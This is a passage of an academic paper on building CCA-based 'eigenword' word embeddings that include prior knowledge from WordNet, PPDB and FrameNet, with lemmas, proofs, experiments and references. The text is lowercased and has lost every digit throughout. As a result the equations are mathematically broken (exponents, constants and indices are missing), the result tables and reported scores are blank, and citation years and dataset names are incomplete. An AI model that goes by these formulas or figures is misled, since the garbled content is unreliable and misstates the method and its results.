al., ; dhillon et al., ) to neural networks jointly learn- ing a language model (bengio et al., ; mikolov et al., a) or models for other nlp tasks (col- lobert and weston, ). canonical correlation analysis for deriving word embeddings one recent approach to derive word embeddings, developed by dhillon et al. ( ), is through the use of canonical correlation analysis, resulting in so- called “eigenwords.” cca is a technique for multi- view dimensionality reduction. it assumes the ex- istence of two views for a set of data, similarly to co-training (yarowsky, ; blum and mitchell, ), and then projects the data in the two views in a way that maximizes the correlation between the projected views. dhillon et al. ( ) used cca to derive word embeddings through the following procedure. they first break each document in a corpus of documents into n sequences of words of a fixed length k + , where k is a window size. for example, if k = , the short document “harry potter has been a best- seller” would be broken into “harry potter has been a” and “potter has been a best-seller.” in each such sequence, the middle word is identified as a pivot. this leads to the construction of the fol- lowing training set from a set of documents: {(w(i) , . . . ,w (i) k ,w (i),w (i) k+ , . . . ,w (i) k ) | i ∈ [n]}. with abuse of notation, this is a multiset, as cer- tain words are expected to appear in certain contexts multiple times. each w(i) is a pivot word, and the rest of the elements are words in the sequence called “the context words.” with this training set in mind, the two views for cca are defined as following. we define the first view through a sparse “context matrix” c ∈ rn× k|h| such that each row in the matrix is a vector, consisting of k one-hot vectors, each of length |h|. each such one-hot vector corre- |h| i n w j w(i) = hj |h| i n k k c j w (i) k = hj |h| figure : the word and context views represented as ma- trix w and c. each row in w is a vector of length |h|, corresponding to a one-hot vector for the word in the ex- ample indexed by the row. each row in c is a vector of length k|h|, divided into sub-vectors each of length |h|. each such sub-vector is a one-hot vector for one of the k context words in the example indexed by the row. sponds to a word that fired in a specific index in the context. in addition, we also define a second view through a matrix w ∈ rn×|h| such that wij = if w(i) = hj. we present both views of the training set in figure . note that now the matrix m = w>c is in r|h|×( k|h|) such that each element mij gives the count of times that hi appeared with the correspond- ing context word and context index encoded by j. similarly, we define a matrix d = diag(w>w) and d = diag(c>c). finally, to get the word em- beddings, we perform singular value decomposition (svd) on the matrix d− / md − / . note that in its original form, cca requires use of w>w and c>c in their full form, and not just the correspond- ing diagonal matrices d and d ; however, in prac- tice, inverting these matrices can be quite intensive computationally and can lead to memory issues. as such, we approximate cca by using the diagonal matrices d and d . from the svd step, we get two projections u ∈ r|h|×m and v ∈ r k|h|×m such that d − / md − / ≈ uΣv > where Σ ∈ rm×m is a diagonal matrix with Σii > being the ith largest singular value of d − / md − / . in order to get the final word em- beddings, we calculate d− / u ∈ r|h|×m. each row in this matrix corresponds to an m-dimensional vector for the corresponding word in the vocabulary. this means that f(hi) for hi ∈ h is the ith row of the matrix d− / u. the projection v can be used to get “context embeddings.” see more about this in dhillon et al. ( ). this use of cca to derive word embeddings follows the usual distributional hypothesis (harris, ) that most word embeddings techniques rely on. in the case of cca, this hypothesis is trans- lated into action in the following way. cca finds projections for the contexts and for the pivot words which are most correlated. this means that if a word co-occurs in a specific context many times (either directly, or transitively through similarity to other words), then this context is expected to be projected to a point “close” to the point to which the word is projected. as such, if two words occur in a specific context many times, these two words are expected to be projected to points which are close to each other. for the next section, we denote x = wd− / and y = cd− / . to refer to the dimensions of x and y generically, we denote d = |h| and d′ = k|h|. in addition, we refer to the column vectors of u and v as u , . . . ,um and v , . . . ,vm. mathematical intuition behind cca the pro- cedure that cca follows finds a projection of the two views in a shared space, such that the correla- tion between the two views is maximized at each co- ordinate, and there is minimal redundancy between the coordinates of each view. this means that cca solves the following sequence of optimization prob- lems for j ∈ [m] where aj ∈ r ×d and bj ∈ r ×d ′ : arg max aj,bj corr(ajw >,bjc >) such that corr(ajw >,akw >) = , k < j corr(bjc >,bkc >) = , k < j where corr is a function that accepts two vectors and return the pearson correlation between the pair- wise elements of the two vectors. the approxi- mate solution to this optimization problem (when using diagonal d and d ) is â>i = d − / ui and b̂>i = d − / vi for i ∈ [m]. cca also has a probabilistic interpretation as a maximum likelihood solution of a latent variable model for two normal random vectors, each drawn based on a third latent gaussian vector (bach and jordan, ). the way we describe cca for deriving word embeddings is related to latent semantic indexing (lsi), which performs singular value decomposition on the matrix m directly, without doing any kind of variance normalization. dhillon et al. ( ) de- scribe some differences between lsi and cca. the extra normalization step decreases the importance of frequent words when doing svd. incorporating prior knowledge into canonical correlation analysis in this section, we detail the technique we use to incorporate prior knowledge into the derivation of canonical correlation analysis. the main motiva- tion behind our approach is to improve the opti- mization of correlation between the two views by weighing them using the external source of prior knowledge. the prior knowledge is based on lex- ical resources such as wordnet, framenet and the paraphrase database. our approach follows a sim- ilar idea to the one proposed by koren and carmel ( ) for improving the visualization of principal vectors with principal component analysis (pca). it is also related to laplacian manifold regularization (belkin et al., ). an important notion in our derivation is that of a laplacian matrix. the laplacian of an undirected weighted graph is an n × n matrix where n is the number of nodes in the graph. it equals d−a where a is the adjacency matrix of the graph (so that aij is the weight for the edge (i,j) in the graph, if it exists, and otherwise) and d is a diagonal matrix such that dii = ∑ j aij. the laplacian is always a sym- metric square matrix such that the sum over rows (or columns) is . it is also positive semi-definite. we propose a generalization of cca, in which we introduce a laplacian matrix into the derivation of cca itself, as shown in figure . we encode prior knowledge about the distances between the projec- tions of two views into the laplacian. the laplacian allows us to improve the optimization of the correla- tion between the two views by weighing them using the external source of prior knowledge. . generalization of cca we present three lemmas (proofs are given in ap- pendix a), followed by our main proposition. these three lemmas are useful to prove our final proposi- tion. the main proposition shows that cca maximizes the distance between the two view projections for any pair of examples i and j, i = j, while mini- mizing the two view projection distance for the two views of an example i. the two views we discuss here in practice are the view of the word through a one-hot representation, and the view which repre- sents the context words for a specific word token. the distance between two view projections is de- fined in eq. . lemma . let x and y be two matrices of size n×d and n × d′, respectively, for example, as defined in § . assume that ∑n i= xij = for j ∈ [d] and∑n i= yij = for j ∈ [d′]. let l be an n × n laplacian matrix such that lij = { n− if i = j − if i = j. ( ) then x>ly equals x>y up to a multiplication by a positive constant. lemma . let a ∈ rd×d′ . then the rank m thin- svd of a can be found by solving the following op- timization problem: max u , . . . ,um, v , . . . ,vm m∑ i= u>i avi such that ||ui|| = ||vi|| = i ∈ [m] 〈ui,uj〉 = 〈vi,vj〉 = i = j where ui ∈ rd× denote the left singular vectors, and vi ∈ rd ′× denote the right singular vectors. d n w n n l prior knowledge (optional) d′ n c diag w>w − d × w> × c × m diag c>c − d ≈ m d u × Σ × d′ mv > x> y figure : introducing prior knowledge in cca. w ∈ rn×d and c ∈ rn×d′ denote the word and context views respectively. l ∈ rn×n is a laplacian matrix encoded with the prior knowledge about the distances between the projections of w and c. the last utility lemma we describe shows that in- terjecting the laplacian between the two views can be expressed as a weighted sum of the distances be- tween the projections of the two views (these dis- tances are given in eq. ), where the weights come from the laplacian. lemma . let u , . . . ,um and v , . . . ,vm be two sets of vectors of length d and d′ respectively. let l ∈ rn×n be a laplacian and x ∈ rn×d and y ∈ rn×d ′ . then: m∑ k= (xuk) >l (y vk) = ∑ i,j −lij ( dmij ) , where dmij = √√√√ ( m∑ k= ([xuk]i − [y vk]j) ) . ( ) the following proposition is our main result for this section. proposition . the matrices u ∈ rd×m and v ∈ rd ′×m that cca computes are the m-dimensional projections that maximize ∑ i,j ( dmij ) −n n∑ i= (dmii ) , ( ) where dmij is defined as in eq. for u , . . . ,um being the columns of u and v , . . . ,vm being the columns of v . proof. according to lemma , the objective in eq. equals ∑m k= (xuk) >l(y vk) where l is defined as in eq. . therefore, maximizing eq. corresponds to maximization of ∑m k= (xuk) >l(y vk) under the constraints that the u and v matrices have orthonor- mal vectors. using lemma , it can be shown that the solution to this maximization is done by doing singular value decomposition on x>ly . accord- ing to lemma , this corresponds to finding u and v by doing singular value decomposition on x>y , because a multiplicative constant does not change the value of the right/left singular vectors. the above proposition shows that cca tries to find projections of both views such that the distances between the two views for pairs of examples with in- dices i = j are maximized (first term in eq. ), while minimizing the distance between the projections of the two views for a specific example (second term in eq. ). therefore, cca tries to project a context and a word in that context to points that are close to each other in a shared space, while maximizing the distance between a context and a word which do not often co-occur together. as long as l is a laplacian, proposition is still true, only with the maximization of the objective ∑ i,j −lij ( dmij ) , ( ) where lij ≤ for i = j and lii ≥ . this result lends itself to a generalization of cca, in which we use predefined weights for the laplacian that encode some prior knowledge about the distances that the projections of two views should satisfy. if the weight −lij is large for a specific (i,j), then we will try harder to maximize the distance be- tween one view of example i and the other view of example j (i.e. we will try to project the word w(i) and the context of example j into distant points in the space). this means that in the current formulation, −lij plays the role of a dissimiliarity indicator between pairs of words. the more dissimilar words are, the larger the weight, and then the more distant the pro- jections are for the contexts and the words. . from cca with dissimilarities to cca with similarities it is often more convenient to work with similarity measures between pairs of words. to do that, we can retain the same formulation as before with the laplacian, where −lij now denotes a measure of similarity. now, instead of maximizing the objective in eq. , we are required to minimize it. it can be shown that such mirror formulation can be done with an algorithm similar to cca, leading to a proposition in the style of proposition . to solve this minimization formulation, we just need to choose the singular vectors associated with the smallest m singular values (instead of the largest). once we change the cca algorithm with the laplacian to choose these projections, we can de- fine l, for example, based on a similarity graph. the graph is an undirected graph that has |h| nodes, for inputs: set of examples {(w(i) , . . . ,w (i) k ,w (i),w (i) k+ , . . . ,w (i) k ) | i ∈ [n]}, an integer m, an α ∈ ( , ], an undirected graph g over h, an integer n. data structures: a matrix m of size |h|× ( k|h|) (cross-covariance matrix), a matrix u corresponding to the word embed- dings algorithm: (cross-covariance estimation) ∀i,j ∈ [n] such that |i− j| ≤ n • if i = j, increase mrs by for r denoting the in- dex of word w(i) and for all s denoting the context indices of words w(i) , . . . ,w (i) k and w (i) k+ , . . . ,w (i) k . • if i = j and word w(i) is connected to word w(j) in g, increase mrs by α for r denoting the index of word w(i) and for all s denoting the context indices of words w(j) , . . . ,w (j) k and w (j) k+ , . . . ,w (j) k . • calculate d and d as specified in § . (singular value decomposition step) • perform singular value decomposition on d − / md − / to get a matrix u ∈ r|h|×m. (word embedding projection) • for each word hi for i ∈ [|h|] return the word em- bedding that corresponds with the ith row of u. figure : the cca-like algorithm that returns word em- beddings with prior knowledge encoded based on a simi- larity graph. each word in the vocabulary, and there is an edge be- tween a pair of words whenever the two words are similar to each other based on some external source of information, such as wordnet (for example, if they are synonyms). we then define the laplacian l such that lij = − if i and j are adjacent in the graph (and i = j), lii is the degree of the node i and lij = in all other cases. by using this variant of cca, we strive to maximize the distance of the two views between words which are adjacent in the graph (or continuing the example above, maximize the distance between words which are not synonyms). in addition, the fewer adjacent nodes a word has (or the more syn- onyms it has), the less important it is to minimize the distance between the two views of that given word. . final algorithm in order to use an arbitrary laplacian matrix with cca, we require that the data is centered, i.e. that the average over all examples of each of the coordi- nates of the word and context vectors is . however, such a prerequisite would make the matrices c and w dense (with many non-zero values), and hard to maintain in memory, and would also make singular value decomposition inefficient. as such, we do not center the data to keep it sparse, and as such, use a matrix l which is not strictly a laplacian, but that behaves better in prac- tice. given the graph mentioned in § which is ex- tracted from an external source of information, we use l such that lij = α for an α ∈ ( , ) which is treated as a smoothing factor for the graph (see below the choices of α) if i and j are not adjacent in the graph, lij = if i = j are adjacent, and finally lii = for all i ∈ [n]. therefore, this ma- trix is symmetric, and the only constraint it does not satisfy is that of rows and columns summing to . scanning the documents and calculating the statistic matrix with the laplacian is computation- ally infeasible with a large number of tokens given as input. it is quadratic in that number. as such, we make another modification to the algorithm, and calculate a “local” laplacian. the modification re- quires an integer n as input (we use n = ), and then it makes updates to pairs of word tokens only if they are within an n-sized window of each. the final algorithm we use is described in figure . the algorithm works by directly computing the co- occurrence matrix m (instead of maintaining w and c). it does so by increasing by any cells corre- sponding to word-context co-occurrence in the doc- uments and by α any cells corresponding to word and contexts that are connected in the graph. experiments in this section we describe our experiments. . experimental setup training data we used three datasets, wiki , wiki and wiki , all based on the first , and we note that other decompositions, such as pca, also re- quire centering of the data, but in case of sparse data matrix, this step is not performed. billion words from wikipedia respectively. each dataset is broken into chunks of length (window sizes of ), corresponding to a document. the above laplacian l is calculated within each document sep- arately. this means that −lij is only if i and j denote two words that appear in the same document. this is done to make the calculations computation- ally feasible. we calculate word embeddings for the top most frequent k words. prior knowledge resources we consider three sources of prior knowledge: wordnet (miller, ), the paraphrase database of ganitkevitch et al. ( ), abbreviated as ppdb, and framenet (baker et al., ). since framenet and wordnet index words in their base form, we use wordnet’s stemmer to identify the base form for the text in our corpora whenever we calculate the laplacian graph. for wordnet, we have an edge in the graph if one word is a synonym, hypernym or hyponym of the other. for ppdb, we have an edge if one word is a paraphrase of the other, according to the database. for framenet, we connect two words in the graph if they appear in the same frame. system implementation we modified the imple- mentation of the swell java package of dhillon et al. ( ). specifically, we needed to modify the loop that iterates over words in each document to a nested loop that iterates over pairs of words, in or- der to compute a sum of the form ∑ ij xrilijyjs. dhillon et al. ( ) use window size k = , which we retain in our experiments. . baselines off-the-shelf word embeddings we compare our word embeddings with existing state-of-the- we downloaded the data from https://dumps. wikimedia.org/, and preprocessed it using the tool avail- able at http://mattmahoney.net/dc/textdata. html. we use the xl subset of the ppdb. https://github.com/paramveerdhillon/ swell. our implementation and the word embeddings that we calculated are available at http://cohort.inf.ed.ac. uk/cohort/eigen/. we also use the square-root transformation as mentioned in dhillon et al. ( ) which controls the variance in the counts accumulated from the corpus. see a justification for this trans- form in stratos et al. ( ). a b c d e f g h i word similarity average geographic analogies np bracketing npk wn pd fn npk wn pd fn npk wn pd fn r et ro fi tt in g glove . . . . . . . . . . . . skip-gram . . . . . . . . . . . . global context . . . . . . . . . . . . multilingual . . . . . . . . . . . . eigen (cca) . . . . . . . . . . . . c c a p ri or α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . c c a p ri or + r f α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . α = . - . . . - . . . - . . . table : results for the word similarity datasets, geographic analogies and np bracketing. the first upper blocks (a–c) present the results with retrofitting. npk stands for no prior knowledge (no retrofitting is used), wn for wordnet, pd for ppdb and fn for framenet. glove, skip-gram, global context, multilingual and eigen are the word embeddings of pennington et al. ( ), mikolov et al. ( b), huang et al. ( ), faruqui and dyer ( ) and dhillon et al. ( ) respectively. the second middle blocks (d–f) show the results of our eigenword embeddings encoded with prior knowledge using our method. each row in the block corresponds to a specific use of an α value (smoothing factor), as described in figure . in the lower blocks (g–i) we take the word embeddings from the second block, and retrofit them using the method of faruqui et al. ( ). best results in each block are in bold. art word embeddings, such as glove (pennington et al., ), skip-gram (mikolov et al., b), global context (huang et al., ) and multilin- gual (faruqui and dyer, ). we also compare our word embeddings with the eigen word embeddings of dhillon et al. ( ) without any prior knowl- edge. retrofitting for prior knowledge we compare our approach of incorporating prior knowledge into the derivation of cca against the previous works where prior knowledge is introduced in the off-the- shelf embeddings as a post-processing step (faruqui et al., ; rothe and schütze, ). in this pa- per, we focus on the retrofitting approach of faruqui et al. ( ). retrofitting works by optimizing an objective function which has two terms: one that tries to keep the distance between the word vectors close to the original distances, and the other which enforces the vectors of words which are adjacent in the prior knowledge graph to be close to each other in the new embedding space. we use the retrofitting package to compare our results in different settings against the results of retrofitting of faruqui et al. ( ). . evaluation benchmarks we evaluated the quality of our eigenword embed- dings on three different tasks: word similarity, geo- graphic analogies and np bracketing. word similarity for the word similarity task we experimented with different widely used bench- marks. the ws- -all dataset (finkelstein et al., ) consists of pairs of english words with their human similarity ratings. later, agirre et al. ( ) re-annotated ws- -all for similarity (ws- -sim) and relatedness (ws- -rel) with specific distinctions between them. the simlex- dataset (hill et al., ) was built to measure how well models capture similarity, rather than relat- edness or association. the men-tr- dataset (bruni et al., ) consists of word pairs https://github.com/mfaruqui/ retrofitting. sampled from words that occur at least times in a large web corpus. the datasets, mturk- (radinsky et al., ) and mturk- (halawi et al., ), were scored by amazon mechanical turk workers for relatedness of english word pairs. the yp- (yang and powers, ) and verb- (baker et al., ) datasets were developed for verb similarity predictions. the last two datasets, mc- (miller and charles, ) and rg- (rubenstein and goodenough, ) consist of and noun pairs respectively. for each dataset, we calculate the cosine similar- ity between the vectors of word pairs and measure spearman’s rank correlation coefficient between the scores produced by the embeddings and human rat- ings. we report the average of the correlations on all datasets. each word similarity task in the above list represents a different aspect of word similarity, and as such, averaging the results points to the qual- ity of the word embeddings on several tasks. we later analyze specific datasets. geographic analogies mikolov et al. ( c) created a test set of analogous word pairs such as a:b c:d raising the analogy question of the form “a is to b as c is to ” where d is unknown. we report results on a subset of this dataset which focuses on finding capitals of common countries, e.g., greece is to athens as iraq is to . this dataset consists of word pairs. for given word pairs, a:b c:d where d is unknown, we use the vector offset method (mikolov et al., b), i.e., we compute a vector v = vb − va + vc where va, vb and vc are vector representations of the words a, b and c respectively; we then return the word d with the greatest cosine similarity to v. np bracketing here the goal is to identify the correct bracketing of a three-word noun (lazaridou et al., ). for example, the bracketing of annual (price growth) is “right,” while the bracketing of (en- try level) machine is “left.” similarly to faruqui and dyer ( ), we concatenate the word vectors of the three words, and use this vector for binary classifi- cation into left or right. since most of the datasets that we evaluate on in this paper are not standardly separated into develop- ment and test sets, we report all results we calculated (with respect to hyperparameter differences) and do not select just a subset of the results. . evaluation preliminary experiments in our first set of ex- periments, we vary the dimension of the word em- bedding vectors. we try m ∈ { , , , }. our experiments showed that the results consistently improve when the dimension increases for all the different datasets. for example, for m = and wiki , we get an average of . on the word sim- ilarity tasks, . for m = , . for m = and . for m = . the more data are available, the more likely larger dimension will improve the quality of the word embeddings. indeed, for wiki , we get an average of . , . , . and . for each of the dimensions. the improvements with re- spect to the dimension are consistent across all of our results, so we fix m at . we also noticed a consistent improvement in ac- curacy when using more data from wikipedia. for example, for m = , using wiki gives an av- erage of . , while using wiki gives an average of . and finally, using wiki gives an average of . . we fix the dataset we use to be wiki . results table describes the results from our first set of experiments. (note that the table is divided into distinct blocks, labeled a through i.) in gen- eral, adding prior knowledge to eigenword embed- dings does improve the quality of word vectors for the word similarity, geographic analogies and np bracketing tasks on several occasions (blocks d–f compared to last row in blocks a–c). for example, our eigenword vectors encoded with prior knowl- edge (ccaprior) consistently perform better than the eigenword vectors that do not have any prior knowledge for the word similarity task ( . , eigen in the first row under npk column, versus block d). the only exceptions are for α = . with word- net ( . ), for α = . with ppdb ( . ) and for α = . with framenet ( . ), where α denotes the smoothing factor. in several cases, running the retrofitting algorithm of faruqui et al. ( ) on top of our word embed- dings helps further, as if “adding prior knowledge twice is better than once.” results for these word embeddings (ccaprior+rf) are shown in table . adding retrofitting to our encoding of prior knowl- edge often performs better for word similarity and np bracketing tasks (block d versus g and block f versus i). interestingly, ccaprior+rf embeddings also often perform better than eigenword vectors (eigen) of dhillon et al. ( ) when retrofitted using the method of faruqui et al. ( ). for example, in the word similarity task, eigenwords retrofitted with wordnet get an accuracy of . whereas encoding prior knowledge using both cca and retrofitting gets a maximum accuracy of . . we see the same pattern for ppdb, with . for “eigen” and . for “ccaprior+rf”. we hypoth- esize that the reason for these changes is that the two methods for encoding prior knowledge maxi- mize different objective functions. the performance with framenet is weaker, in some cases leading to worse performance (e.g., with glove and sg vectors). we believe that framenet does not perform as well as the other lexicons be- cause it groups words based on very abstract con- cepts; often words with seemingly distantly related meanings (e.g., push and growth) can evoke the same frame. this also supports the findings of faruqui et al. ( ), who noticed that the use of framenet as a prior knowledge resource for improv- ing the quality of word embeddings is not as helpful as other resources such as wordnet and ppdb. we note that cca works especially well for the geographic analogies dataset. the quality of eigen- word embeddings (and the other embeddings) de- grades when we encode prior knowledge using the method of faruqui et al. ( ). our method im- proves the quality of eigenword embeddings. global picture of the results when comparing retrofitting to cca with prior knowledge, there is a noticable difference. retrofitting performs well or badly, depending on the dataset, while the re- sults with cca are more stable. we attribute this to the difference between how our algorithm and retrofitting work. retrofitting makes a direct use of the source of prior knowledge, by adding a regular- ization term that enforces words which are similar according to the prior knowledge to be closer in the embedding space. our algorithm, on the other hand, makes a more indirect use of the source of prior knowledge, by changing the co-occurence matrix on which we do singular value decomposition. specifically, we believe that our algorithm is more stable to cases in which words for the task at hand are unknown words with respect to the source of prior knowledge. this is demonstrated with the ge- ographical analogies task: in that case, retrofitting lowers the results in most cases. the city and coun- try names do not appear in the sources of prior knowledge we used. further analysis we further inspected the results on the word similarity tasks for the rg- and ws- -all datasets. our goal was to find cases in which either cca embeddings by themselves out- perform other types of embeddings or that encoding prior knowledge into cca the way we describe sig- nificantly improves the results. for the ws- -all dataset, the eigenword em- beddings get a correlation of . . the next best performing word embeddings are the multilingual word embeddings ( . ) and skip-gram ( . ). in- terestingly enough, the multilingual word embed- dings also use cca to project words into a low- dimensional space using a linear transformation, suggesting that linear projections are a good fit for the ws- -all dataset. the dataset itself includes pairs of common words with a corresponding simi- larity score. the words that appear in the dataset are actually expected to occur in similar contexts, a property that cca directly encodes when deriving word embeddings. the best performance on the rg- dataset is with the glove word embeddings ( . ). cca em- beddings give an accuracy of . on that dataset. however, with this dataset, we observe significant improvement when encoding prior knowledge using our method. for example, using wordnet with this dataset improves the results by . points ( . ). us- ing the method of faruqui et al. ( ) (with word- net) on top of our cca word embeddings improves the results even further by . points ( . ). the role of prior knowledge we also designed an experiment to test whether using distributional in- formation is necessary for having well-performing word embeddings, or whether it is sufficient to rely on the prior knowledge resource. in order to test this, we created a sparse matrix that corresponds to the graph based on the external resource graph. we then follow up with singular value decomposition on resource wordsim np bracketing wordnet . . ppdb . . framenet . . table : results on word similarity dataset (average over datasets) and np bracketing. the word embed- dings are derived by using svd on the similarity graph extracted from the prior knowledge source (wordnet, ppdb and framenet). that graph, and get embeddings of size . table gives the results when using these embeddings. we see that the results are consistently lower than the results that appear in table , implying that the use of prior knowledge comes hand in hand with the use of distributional information. when using the retrofitting method by faruqui et al. on top of these word embeddings, the results barely improved. related work our ideas in this paper for encoding prior knowl- edge in eigenword embeddings relate to three main threads in existing literature. one of the threads focuses on modifying the ob- jective of word vector training algorithms. yu and dredze ( ), xu et al. ( ), fried and duh ( ) and bian et al. ( ) augment the training objective in neural language models of mikolov et al. ( a) to encourage semantically related word vectors to come closer to each other. wang et al. ( ) propose a method for jointly embedding en- tities (from freebase, a large community-curated knowledge base) and words (from wikipedia) into the same continuous vector space. chen and de melo ( ) propose a similar joint model to im- prove the word embeddings, but rather than us- ing structured knowledge sources their model fo- cuses on discovering stronger semantic connections in specific contexts in a text corpus. another research thread relies on post-processing steps to encode prior knowledge from semantic lex- icons in off-the-shelf word embeddings. the main intuition behind this trend is to update word vec- tors by running belief propagation on a graph ex- tracted from the relation information in semantic lexicons. the retrofitting approach of faruqui et al. ( ) uses such techniques to obtain higher quality semantic vectors using wordnet, framenet, and the paraphrase database. they report on how retrofitting helps improve the performance of vari- ous off-the-shelf word vectors such as glove, skip- gram, global context, and multilingual, on vari- ous word similarity tasks. rothe and schütze ( ) also describe how standard word vectors can be ex- tended to various data types in semantic lexicons, e.g., synsets and lexemes in wordnet. most of the standard word vector training algo- rithms use co-occurrence within window-based con- texts to measure relatedness among words. sev- eral studies question the limitations of defining re- latedness in this way and investigate if the word co-occurrence matrix can be constructed to encode prior knowledge directly to improve the quality of word vectors. wang et al. ( ) investigate the no- tion of relatedness in embedding models by incor- porating syntactic and lexicographic knowledge. in spectral learning, yih et al. ( ) augment the word co-occurrence matrix on which lsa operates with relational information such that synonyms will tend to have positive cosine similarity, and antonyms will tend to have negative similarities. their vector space representation successfully projects synonyms and antonyms on opposite sides in the projected space. chang et al. ( ) further generalize this approach to encode multiple relations (and not just opposing relations, such as synonyms and antonyms) using multi-relational lsa. in spectral learning, most of the studies on in- corporating prior knowledge in word vectors focus on lsa based word embeddings (yih et al., ; chang et al., ; turney and littman, ; tur- ney, ; turney and pantel, ). from the technical perspective, our work is also related to that of jagarlamudi et al. ( ), who showed how to generalize cca so that it uses lo- cality preserving projections (he and niyogi, ). they also assume the existence of a weight matrix in a multi-view setting that describes the distances between pairs of points in the two views. more generally, cca is an important component for spectral learning algorithms in the unsupervised setting and with latent variables (cohen et al., ; narayan and cohen, ; stratos et al., ). our method for incorporating prior knowledge into cca could potentially be transferred to these algorithms. conclusion we described a method for incorporating prior knowledge into cca. our method requires a rela- tively simple change to the original canonical cor- relation analysis, where extra counts are added to the matrix on which singular value decomposition is performed. we used our method to derive word em- beddings in the style of eigenwords, and tested them on a set of datasets. our results demonstrate several advantages of encoding prior knowledge into eigen- word embeddings. acknowledgements the authors would like to thank paramveer dhillon for his help with running the swell package. the authors would also like to thank manaal faruqui and sujay kumar jauhar for their help and techni- cal assistance with the retrofitting package and the word embedding evaluation suite. thanks also to ankur parikh for early discusions on this project. this work was completed while the first author was an intern at the university of edinburgh, as part of the equate scotland program. this research was supported by an epsrc grant (ep/l x/ ) and an eu h grant ( /h -ict- ; summa). appendix a: proofs proof of lemma . the proof is similar to the one that appears in koren and carmel ( ) for lemma . . the only difference is the use of two views. note that [x>ly ]ij = ∑ k,k′ xkilkk′yk′j . as such, [x>ly ]ij = ∑ k,k′ (nδkk′ − )xkiyk′j = n∑ k= nxkiykj − ( n∑ k= xki ) ︸ ︷︷ ︸ × ( n∑ k′= yk′j ) ︸ ︷︷ ︸ = n[x>y ]ij, where δkk′ = iff k = k′ and otherwise, and the sec- ond equality relies on the assumption of the data being centered. proof of lemma . without loss of generality, assume d ≤ d′. let u′ , . . . ,u′d be the left singular vectors of a and v′ , . . . ,v ′ d′ be the right ones, and σ , . . . ,σd be the singular values. therefore a = ∑d j= σju ′ j(v ′ j) >. in addition, the objective equals (after substituting a): m∑ i= d∑ j= σj〈ui,u′j〉〈vi,v′j〉 = d∑ j= σj ( m∑ i= 〈ui,u′j〉〈vi,v′j〉 ) ( ) note that by the cauchy-schwartz inequality: d∑ j= m∑ i= 〈ui,u′j〉〈vi,v′j〉 = m∑ i= d∑ j= 〈ui,u′j〉〈vi,v′j〉 ≤ m∑ i= √√√√ d∑ j= |〈ui,u′j〉| √√√√ d∑ j= |〈vi,v′j〉| ≤ m in addition, note that if we choose ui = u′i and vi = v′i, then the inequality above becomes an equality, and in addition, the objective in eq. will equal the sum of the m largest singular vectors ∑m j= σj . as such, this assignment to ui and vi maximizes the objective. proof of lemma . first, by definition of matrix multi- plication, m∑ k= (xuk) >l (y vk) = ∑ i,j lij ( m∑ k= [xuk]i[y vk]j ) . ( ) also, ( dmij ) = ( m∑ k= [xuk] i − [xuk]i[y vk]j + [y vk] j ) . therefore, ∑ i,j −lij ( dmij ) = ∑ i,j −lij ( m∑ k= − [xuk]i[y vk]j ) + ∑ i,j −lij ( m∑ k= [xuk] i + [y vk] j ) ︸ ︷︷ ︸ = ∑ i,j lij ( m∑ k= [xuk]i[y vk]j, ) ( ) where the first two terms disappear because of the defini- tion of the laplacian. the comparison of eq. to eq. gives us the necessary result. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius paşca, and aitor soroa. . a study on similarity and relatedness using distribu- tional and wordnet-based approaches. in proceedings of hlt-naacl. francis bach and michael jordan. . a probabilistic interpretation of canonical correlation analysis. tech report , department of statistics, university of california, berkeley. collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in proceed- ings of acl. simon baker, roi reichart, and anna korhonen. . an unsupervised model for instance level subcatego- rization acquisition. in proceedings of emnlp. mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for depen- dency parsing. in proceedings of acl. mikhail belkin, partha niyogi, and vikas sindhwani. . manifold regularization: a geometric frame- work for learning from labeled and unlabeled exam- ples. journal of machine learning research, : – . yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. journal of machine learning research, : – . jiang bian, bin gao, and tie-yan liu. . knowledge-powered deep learning for word embed- ding. in machine learning and knowledge discovery in databases, volume of lecture notes in com- puter science, pages – . avrim blum and tom mitchell. . combining la- beled and unlabeled data with co-training. in proceed- ings of colt. elia bruni, nam-khanh tran, and marco baroni. . multimodal distributional semantics. journal of arti- ficial intelligence research, : – . kai-wei chang, wen-tau yih, and christopher meek. . multi-relational latent semantic analysis. in proceedings of emnlp. jiaqiang chen and gerard de melo. . semantic in- formation extraction for improved word embeddings. in proceedings of naacl workshop on vector space modeling for nlp. shay b. cohen, k. stratos, michael collins, dean p. fos- ter, and lyle ungar. . spectral learning of latent- variable pcfgs: algorithms and sample complexity. journal of machine learning research. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proceedings of icml. scott deerwester, susan t. dumais, george w. furnas, thomas k. landauer, and richard harshman. . indexing by latent semantic analysis. journal of the american society for information science, ( ): – . paramveer s. dhillon, dean p. foster, and lyle h. ungar. . eigenwords: spectral word embeddings. jour- nal of machine learning research, : – . manaal faruqui and chris dyer. . improving vector space word representations using multilingual correla- tion. in proceedings of eacl. manaal faruqui and chris dyer. . non- distributional word vector representations. in pro- ceedings of acl. manaal faruqui, jesse dodge, sujay k. jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. in pro- ceedings of naacl. lev finkelstein, gabrilovich evgenly, matias yossi, rivlin ehud, solan zach, wolfman gadi, and ruppin eytan. . placing search in context: the concept revisited. acm transactions on information systems, ( ): – . daniel fried and kevin duh. . incorporating both distributional and relational semantics in word repre- sentations. in proceedings of iclr. juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of naacl. guy halawi, gideon dror, evgeniy gabrilovich, and yehuda koren. . large-scale learning of word relatedness with constraints. in proceedings of acm sigkdd. zellig s. harris. . co-occurrence and transforma- tion in linguistic structure. language, ( ): – . xiaofei he and partha niyogi. . locality preserving projections. in proceedings of nips. felix hill, roi reichart, and anna korhonen. . simlex- : evaluating semantic models with (gen- uine) similarity estimation. computational linguis- tics, ( ): – . eric h huang, richard socher, christopher d manning, and andrew y ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of acl. jagadeesh jagarlamudi and hal daumé. . regu- larized interlingual projections: evaluation on mul- tilingual transliteration. 